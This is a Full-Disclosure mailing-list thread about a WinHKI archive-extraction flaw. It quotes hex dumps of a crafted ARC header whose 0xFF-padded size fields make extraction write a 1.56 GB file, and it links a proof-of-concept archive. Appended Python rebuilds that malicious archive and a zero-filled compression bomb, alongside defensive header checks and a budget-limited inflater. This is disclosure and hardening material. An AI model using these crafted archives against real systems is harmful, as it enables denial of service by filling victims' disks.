Message-ID: <20050108092930.73686.qmail@web20222.mail.yahoo.com>
From: visitbipin at yahoo.com (bipin gautam)
Subject: WinHKI - ARC File Extraction of 1KB to 1.56GB

That's obvious, isn't it... say... if you create a few-GB
file with null characters, 0x00, and compress
it...... that will produce a similar result. Such an
issue has been known for any file compression utility for ages.


Any... software will do the same! Try it. And THAT'S
OBVIOUS!
--- "Rafel Ivgi, The-Insider" <theinsider@....net.il>
wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> Application:    WinHKI
> Vendors:        http://www.webtoolmaster.com
> Versions:       1.4d
> Platforms:      Windows
> Bug:            ARC File Extraction of 1KB to 1.56GB
> Exploitation:   Local (extract file)
> Date:           24 Dec 2004
> Author:         Rafel Ivgi, The-Insider
> E-Mail:         the_insider@...l.com
> Website:        http://theinsider.deep-ice.com
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> 1) Introduction
> 2) Bugs
> 3) The Code
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> ===============
> 1) Introduction
> ===============
> 
> WinHKI is a file archiver which supports: ARC, BH, CAB, HKI, JAR, LHA,
> TAR, GZ compressions.
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> ======
> 2) Bug
> ======
> 
> This is a normal CAB compressed file header
> 
> 00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B  ..251.HTM.^^^^^.
> 00000010 0000 0078 3139 73B5 121B 0000 003C 7363  ...x19s......<sc
> 00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73  ript.>alert()</s
> 00000030 6372 6970 743E 0D0A 1A00                 cript>....
> 
> By adding after the filename header a certain amount of chars
> and replacing all nulls (00) with FF (in order to avoid our
> long string from being terminated)
> 
> 00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF  ..251.HTM.^^^^^.
> 00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
> 00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B  ................
> 00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363  ...x19s......<sc
> 00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73  ript.>alert()</s
> 00000430 6372 6970 743E 0D0A 1A00                 cript>....
> 
> 
> HKI will create a 1.56 gigabyte file at the
> selected extract location.
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> ===========
> 3) The Code
> ===========
> 
> An online proof of concept can be found at:
> http://theinsider.deep-ice.com/hki156gb.ARC
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> ---
> Rafel Ivgi, The-Insider
> http://theinsider.deep-ice.com
> 
> "Scripts and Codes will make me D.O.S , but they
> will never HACK me."
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.netsys.com/full-disclosure-charter.html
> 
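As an added example (my code, not WinHKI's and not the advisory author's), here is a fixed-layout parser for the entry header shown in the two dumps above, with the checks an extractor should run before it writes anything to disk. The header layout is an assumption on my part (the classic ARC entry header as I know it: marker, method, 13-byte name, compressed size, date, time, CRC-16, original size); the first dump decodes consistently under it, both size fields coming out as 27, which is exactly the length of the stored data. The two byte strings are reconstructed from the dumps, and the 64 MiB output budget is an arbitrary value chosen for illustration.

```python
"""Parse and sanity-check ARC entry headers before extraction.

Assumed layout of one entry header (classic ARC, little-endian):

    offset  size  field
    0       1     0x1A marker
    1       1     method (0 = end of archive, 1 = legacy stored, 2 = stored, 3.. = packed)
    2       13    file name, NUL-terminated and NUL-padded
    15      4     compressed size
    19      2     DOS date
    21      2     DOS time
    23      2     CRC-16
    25      4     original size (absent for method 1)
"""
import struct

MARKER = 0x1A
HEADER_FMT = "<BB13sIHHHI"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 29 bytes

# Reconstructed from the first dump: one stored entry with 27 bytes of data,
# followed by the 0x1A 0x00 end-of-archive marker.
BENIGN_ARC = bytes.fromhex(
    "1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B"
    "0000 0078 3139 73B5 121B 0000 003C 7363"
    "7269 7074 FB3E 616C 6572 7428 293C 2F73"
    "6372 6970 743E 0D0A 1A00"
)

# Constructed to match the second dump: every NUL becomes 0xFF and 0x400 bytes
# of 0xFF sit between the name field and the size fields, so a fixed-layout
# parser reads 0xFFFFFFFF for both sizes.
_PAYLOAD = BENIGN_ARC[HEADER_LEN:HEADER_LEN + 27]
MALICIOUS_ARC = (
    bytes.fromhex("1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF")
    + b"\xFF" * 0x3FF
    + bytes.fromhex("1BFF FFFF 7831 3973 B512 1BFF FFFF")
    + _PAYLOAD
    + b"\x1A\x00"
)


def parse_entry(buf, offset=0):
    """Parse the entry header at `offset`; return None at the end-of-archive marker."""
    if len(buf) - offset < 2 or buf[offset] != MARKER:
        raise ValueError(f"no ARC marker at offset {offset}")
    method = buf[offset + 1]
    if method == 0:
        return None
    if method == 1:
        raise ValueError("legacy method 1 header (25 bytes, no original size) not handled")
    if len(buf) - offset < HEADER_LEN:
        raise ValueError(f"truncated header at offset {offset}")
    _, _, raw_name, csize, _date, _time, crc, osize = struct.unpack_from(HEADER_FMT, buf, offset)
    return {
        "method": method,
        "raw_name": raw_name,
        "name": raw_name.split(b"\x00", 1)[0],
        "compressed_size": csize,
        "original_size": osize,
        "crc": crc,
        "data_offset": offset + HEADER_LEN,
    }


def check_entry(entry, archive_len, max_output=64 * 1024 * 1024):
    """Return (ok, reason). Every header field is attacker-controlled, so each is bounded."""
    csize, osize = entry["compressed_size"], entry["original_size"]
    if entry["data_offset"] + csize > archive_len:
        return False, f"compressed size {csize} runs past the end of the archive"
    if osize > max_output:
        return False, f"declared original size {osize} exceeds the {max_output}-byte budget"
    if entry["method"] == 2 and osize != csize:
        return False, "stored entry declares different compressed and original sizes"
    if b"\x00" not in entry["raw_name"]:
        return False, "file name is not NUL-terminated"
    if any(c < 0x20 or c > 0x7E for c in entry["name"]):
        return False, "file name contains control or non-ASCII bytes"
    return True, "ok"


def audit(buf, max_output=64 * 1024 * 1024):
    """Walk the archive; return [(name, ok, reason), ...], stopping at the first bad entry."""
    results, offset = [], 0
    while True:
        entry = parse_entry(buf, offset)
        if entry is None:
            return results
        ok, reason = check_entry(entry, len(buf), max_output)
        results.append((entry["name"], ok, reason))
        if not ok:
            return results
        offset = entry["data_offset"] + entry["compressed_size"]


if __name__ == "__main__":
    for label, arc in (("benign", BENIGN_ARC), ("malicious", MALICIOUS_ARC)):
        print(label, audit(arc))
```

The order of the checks matters: the compressed-size bound is tested against the bytes actually present in the archive, which no header field can lie about, and it is what rejects the second dump before its 0xFFFFFFFF original size is ever used to size an output file.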


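To put numbers on the point made in the reply (a file of 0x00 bytes compresses to almost nothing with any compressor, so the archive's size is no guide to what extraction will write), here is an added example that is not part of the original thread. zlib stands in for whatever compressor an archiver uses, the zero-filled input is constructed in the code, and the extractor caps the bytes it actually produces rather than trusting a size field in the container; the 16 MiB input and the budgets are arbitrary values chosen so the example runs quickly.

```python
"""A zero-filled 'bomb' and an inflater that refuses to exceed an output budget."""
import zlib

MiB = 1024 * 1024


def make_zero_bomb(size_mib=16):
    """Compress size_mib MiB of 0x00 (constructed input). Returns (blob, original_len)."""
    co = zlib.compressobj(9)
    chunk = b"\x00" * MiB
    blob = bytearray()
    for _ in range(size_mib):
        blob += co.compress(chunk)
    blob += co.flush()
    return bytes(blob), size_mib * MiB


class OutputBudgetExceeded(Exception):
    """Raised before the budget is crossed, so nothing oversized is ever produced."""


def bounded_inflate(blob, max_output, chunk_size=64 * 1024):
    """Inflate `blob`, producing at most max_output bytes in total.

    Decompress.decompress(data, max_length) caps each call's output; input it
    did not reach is kept in unconsumed_tail and fed back on the next call.
    The limit is applied to bytes actually produced, not to any size the
    container declared, because the container's size fields are untrusted.
    """
    d = zlib.decompressobj()
    out = bytearray()
    data = blob
    while not d.eof:
        piece = d.decompress(data, chunk_size)
        data = d.unconsumed_tail
        if not piece and not data:
            raise ValueError("truncated or corrupt stream")
        if len(out) + len(piece) > max_output:
            consumed = len(blob) - len(data)
            raise OutputBudgetExceeded(
                f"output would exceed {max_output} bytes after {consumed} input bytes"
            )
        out += piece  # a real extractor would write each piece to disk here
    return bytes(out)


def fits_budget(blob, max_output):
    """True if blob inflates within max_output bytes, False if the budget trips."""
    try:
        bounded_inflate(blob, max_output)
    except OutputBudgetExceeded:
        return False
    return True


if __name__ == "__main__":
    blob, original = make_zero_bomb(16)
    print(f"{original} bytes of zeros -> {len(blob)} bytes compressed "
          f"({original // len(blob)}:1)")
    print("fits 32 MiB budget:", fits_budget(blob, 32 * MiB))
    print("fits 1 MiB budget: ", fits_budget(blob, 1 * MiB))
```

A compression-ratio check on the archive alone is not a substitute for this: the ratio only becomes visible once the output exists, whereas the budget stops the write mid-stream, having spent at most one chunk of memory over the limit it was asked to enforce.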
